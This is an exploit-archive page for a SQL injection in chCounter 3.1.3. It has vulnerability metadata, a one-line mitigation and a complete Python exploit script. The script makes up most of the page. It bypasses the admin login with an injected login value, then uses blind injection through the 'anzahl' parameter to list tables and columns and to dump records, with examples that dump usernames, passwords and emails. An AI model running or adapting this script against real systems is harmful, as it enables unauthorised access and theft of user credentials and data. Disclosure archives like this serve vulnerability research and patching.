header-logo
Suggest Exploit
vendor:
chCounter
by:
Matias Fontanini
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: chCounter
Affected Version From: 3.1.3
Affected Version To: 3.1.3
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Ubuntu Server 10.04 with apache
2010

chCounter <= 3.1.3 SQLInjection

When accessing administration/index.php?cat=downloads&edit=VALID_ID and using a valid download id, an attacker is able to manipulate the "anzahl" parameter to perform queries which only involve returning an integer. The query output will be sent back to the client in the "anzahl" text input.

Mitigation:

Ensure that the "anzahl" parameter is properly sanitized and validated before being used in a query.
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Exploit Title: chCounter <= 3.1.3 SQLInjection
# Date: 2010/11/18
# Author: Matias Fontanini(mfontanini@cert.unlp.edu.ar).
# Software Link: http://chcounter.org/chCounter3/getfile.php?id=5
# Version: 3.1.3
# Tested on: Ubuntu Server 10.04 with apache
#
# Requirements: 
# - Downloads must be enabled(this is not default).
# - magic_quotes off. 
# - Access to administration site(can be bypassed if magic_quotes off)
#
# =SQLInjection=
# Location: administration/index.php?cat=downloads&edit=
# Affected parameters: anzahl
# Method: POST
# Severity: High
# Description: When accessing administration/index.php?cat=downloads&edit=VALID_ID
# and using a valid download id, an attacker is able to manipulate the "anzahl"
# parameter to perform queries which only involve returning an integer. The query
# output will be sent back to the client in the "anzahl" text input.
# Exploit: An attacker could perform repeated crafted requests to retrieve any 
# database records for which the user has access.

import sys
import httplib, urllib
import types

lookupString='name="anzahl" value="'

def generateHeaders(host, sessid):
    headers = {'Host':host,
            'User-Agent':'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12',
            'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language':'en-us,en;q=0.5',
            'Accept-Encoding':'deflate',
            'Accept-Charset:':'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
            'Keep-Alive':'115',
            'Connection':'keep-alive',
            'Content-Type':'application/x-www-form-urlencoded',
            'Referer':'http://' + host,
            'Cookie':'PHPSESSID='+sessid}
    if sessid == '':
        del headers['Cookie']
    return headers


def loginRequest(connection, sessid, host, path):
    headers = generateHeaders(host, sessid)
    params = urllib.urlencode({'login_form':'1','login_name':'or \'=\'','login_pw':''})
    connection.request('POST', path + 'administration/index.php', params, headers)
    return connection.getresponse()


def generateSessId(connection, host, path):
    headers = generateHeaders(host, '')
    connection.request('GET', path + 'stats/online_users.php', '', headers)
    response = connection.getresponse()
    cookie = response.getheader('Set-Cookie')
    if type(cookie) is types.NoneType:
        print '[-] Could not get session id. Wrong path?'
        exit(2)
    return cookie[10:cookie.find(';')]
    
def genSessid(host, path):
    print '[+] Trying ' + host + path
    con = connectToHost(host)
    sessid = generateSessId(con, host, path)
    print '[+] Acquired PHPSESSID -> ' + sessid
    con = connectToHost(sys.argv[1])
    output = loginRequest(con, sessid, host, path).read()
    if output.find('login_name') != -1:
        print '[-] Could not bypass login'
        exit(7)
    return sessid

def guessLen(sessid, host, field, path, dId, table):
    headers = generateHeaders(host, sessid)
    connection = connectToHost(host)
    params = urllib.urlencode({'dl_id':dId,
                               'name':'test','url':'http://test.com',
                               'wert':'test',
                               'timestamp_eintrag':'2010-11-17, 15:43:00',
                               'timestamp':'2010-11-17, 15:43:00',
                               'edit_download':'Save entry',
                               'anzahl':'(select length(val) from (select '+field+' as val from '+table+') as xYsdS)'})
    connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
    response = connection.getresponse().read()
    if response.find('command denied') != -1:
        print '[-] Could not acces table. Acces denied.'
        exit(4)
    index = response.find(lookupString)
    return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))


def guessField(sessid, host, path, dId, field, table):
    sz=guessLen(sessid, host, field, path, dId, table)
    headers = generateHeaders(host, sessid)
    i=1
    while i <= sz: 
        connection = connectToHost(host)
        params = urllib.urlencode({'dl_id':dId,
                                   'name':'test','url':'http://test.com',
                                   'wert':'test',
                                   'timestamp_eintrag':'2010-11-17, 15:43:00',
                                   'timestamp':'2010-11-17, 15:43:00',
                                   'edit_download':'Save entry',
                                   'anzahl':'(select ascii(substring(val,'+str(i)+',1)) from (select '+field+' as val from '+table+') as x)'})
        connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
        response = connection.getresponse().read()
        index = response.find(lookupString)
        sys.stdout.write(chr(int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))))
        sys.stdout.flush()
        i += 1


def getValidId(sessid, host, path):
    headers = generateHeaders(host, sessid)
    connection = connectToHost(host)
    connection.request('GET', path + 'administration/index.php?cat=downloads', '', headers)
    response = connection.getresponse().read()
    if response.find('ID') == -1:
        print '[-] Downloads seem to be deactivated'
        exit(6)
    index=response.find('index.php?cat=downloads&edit=')
    return int(str(response[index+len('index.php?cat=downloads&edit='):response.find('"', index+len('index.php?cat=downloads&edit='))]))

def getRowCount(sessid, host, path, dId, field, table):
    headers = generateHeaders(host, sessid)
    connection = connectToHost(host)
    params = urllib.urlencode({'dl_id':dId,
                               'name':'test','url':'http://test.com',
                               'wert':'test',
                               'timestamp_eintrag':'2010-11-17, 15:43:00',
                               'timestamp':'2010-11-17, 15:43:00',
                               'edit_download':'Save entry',
                               'anzahl':'(select count(distinct('+field+')) from '+table+')'})
    connection.request('POST', path + 'administration/index.php?cat=downloads&edit='+str(dId), params, headers)
    response = connection.getresponse().read()
    if response.find('command denied') != -1:
        print '[-] Could not acces table. Acces denied.'
        exit(4)
    index = response.find(lookupString)
    return int(str(response[index+len(lookupString):response.find('"', index+len(lookupString))]))

def getSchemas(sessid, host, path, dId):	
    rows=getRowCount(sessid, host, path, dId,'schema_name', 'information_schema.schemata')
    print '[+] Schema count: ' + str(rows)
    for i in range(0, rows):
        sys.stdout.write('[+] Table name: ')
        guessField(sessid, host, path, dId,'schema_name', 'information_schema.schemata limit 1 offset '+str(i))
        print ''

def getTables(sessid, host, path, dId):	
    rows=getRowCount(sessid, host, path, dId,'table_name', 'information_schema.tables')
    print '[+] Table count: ' + str(rows)
    for i in range(0, rows):
        sys.stdout.write('[+] Table name: ')
        guessField(sessid, host, path, dId,'table_name', 'information_schema.tables limit 1 offset '+str(i))
        print ''


def getColumns(sessid, host, path, dId, table):	
    rows=getRowCount(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\'')
    print '[+] Column count: ' + str(rows)
    for i in range(0, rows):
        sys.stdout.write('[+] Column name: ')
        guessField(sessid, host, path, dId,'column_name', 'information_schema.columns where table_name = \'' + table + '\' limit 1 offset '+str(i))
        print ''

def getItems(sessid, host, path, dId, table, columns, orderby):	
    rows=getRowCount(sessid, host, path, dId, columns[0], table)
    print '[+] Item count: ' + str(rows)
    print '[+] Dump:'
    for i in range(0, rows):
        for col in columns:
            if len(orderby):
                sys.stdout.write(' || ')
                guessField(sessid, host, path, dId, col, table+' order by ' + orderby + ' limit 1 offset '+str(i))
            else:
                sys.stdout.write(' || ')
                guessField(sessid, host, path, dId, col, table+' limit 1 offset '+str(i))
        print ' || '

def connectToHost(host):
    con = httplib.HTTPConnection(sys.argv[1], 80)
    tries=5
    recon=True
    while tries > 0 and recon == True:
        try:
            con.connect();
            recon = False
        except:
            tries -= 1
    if tries == 0:
        print '[-] Could not establish connection'
        exit(3)
    return con

def printHelp():
    print '[-] Usage ' + sys.argv[0] + ' <WEBSERVER> <PATH_TO_CHCOUNTER> <OPTION> [ARGS]'
    print '    OPTION can be:'
    print '                    -t to list all tables'
    print '                    -c <TABLE> to list all columns from table TABLE'
    print '                    -s <TABLE> to list all columns from table TABLE'
    print '                    -i <TABLE> <COLUMNS*> [ORDERBY] to list TABLE:COLUMN items.'
    print '                         COLUMNS* can be a comma-separated list of columns'
    print ''
    print '   Examples:'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -t'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -s'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -c users'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username,passwd,email'
    print '   ' + sys.argv[0] + ' www.vulnerable.com /chCounter/ -i users username user_id'
    print '                       The last example outputs result ordered by user_id'
    exit(1)

if len(sys.argv) < 4:
    printHelp()

sessid = genSessid(sys.argv[1], sys.argv[2])
valId = getValidId(sessid, sys.argv[1], sys.argv[2])

if sys.argv[3] == '-t':
    getTables(sessid, sys.argv[1], sys.argv[2], valId)
    exit(0)
if sys.argv[3] == '-c':
    if len(sys.argv) < 5:
        printHelp()
    getColumns(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4])
    exit(0)
if sys.argv[3] == '-i':
    if len(sys.argv) < 6:
        printHelp()
    orderby=''
    if len(sys.argv) == 7:
        orderby = sys.argv[6]
        orderby = sys.argv[6]
    getItems(sessid, sys.argv[1], sys.argv[2], valId, sys.argv[4], sys.argv[5].split(','), orderby)
    exit(0)
if sys.argv[3] == '-s':
    if len(sys.argv) < 4:
        printHelp()
    getSchemas(sessid, sys.argv[1], sys.argv[2], valId)
    exit(0)

Navigation

Suggest Exploit

Services By CQR